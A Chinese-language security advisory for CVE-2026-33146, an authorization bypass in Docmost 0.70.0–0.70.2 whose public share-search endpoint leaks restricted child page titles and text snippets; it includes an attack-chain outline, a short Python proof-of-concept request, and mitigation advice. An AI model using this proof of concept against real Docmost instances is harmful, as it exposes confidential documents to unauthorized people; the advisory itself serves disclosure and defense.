CVE-2026-33146 CVSS 4.3 中危

CVE-2026-33146 Docmost授权绕过漏洞

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33146

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Docmost

漏洞概述

Docmost是一款开源协作wiki和文档软件。在0.70.0至0.70.2版本中，存在一个授权绕过漏洞。该漏洞允许未经身份验证的用户通过公共搜索端点枚举并检索本应对公共分享查看者隐藏的受限子页面标题和文本片段，导致机密性泄露。

技术细节

该漏洞的核心在于Docmost在处理公共分享链接的搜索功能时，未能对子页面的访问权限进行有效校验。具体而言，`/api/search/share-search`接口在处理搜索请求时，仅验证了分享链接本身的有效性，而忽略了层级页面中可能存在的更细粒度的权限控制。攻击者可以利用这一点，通过向该接口发送包含特定查询条件的POST请求，绕过身份验证机制，从而获取到那些被标记为“受限”或仅对特定用户可见的子页面标题及文本片段。这种攻击方式不需要复杂的用户交互，仅需网络访问权限即可实施，极易导致敏感信息的非授权披露。

攻击链分析

STEP 1

侦察

攻击者识别出目标Docmost实例，并确认其版本在0.70.0至0.70.2之间。

STEP 2

利用

攻击者向`/api/search/share-search`端点发送特制的POST请求，尝试搜索内容。

STEP 3

数据泄露

系统返回包含受限子页面标题和文本片段的搜索结果，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL for the vulnerable search endpoint
target_url = "https://<docmost-instance>/api/search/share-search"

# Payload to search for restricted content
# The vulnerability allows enumerating child pages not meant for public view
payload = {
    "query": ""
}

try:
    # Sending POST request to the vulnerable endpoint
    response = requests.post(target_url, json=payload)
    
    if response.status_code == 200:
        data = response.json()
        # Check if sensitive data (restricted child pages) is returned
        print("[+] Vulnerability confirmed. Data retrieved:")
        print(data)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[!] Error occurred:", e)

影响范围

Docmost 0.70.0

Docmost 0.70.1

Docmost 0.70.2

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用公共分享功能或通过WAF等安全设备阻断针对`/api/search/share-search`接口的非法访问请求，以防止敏感数据泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表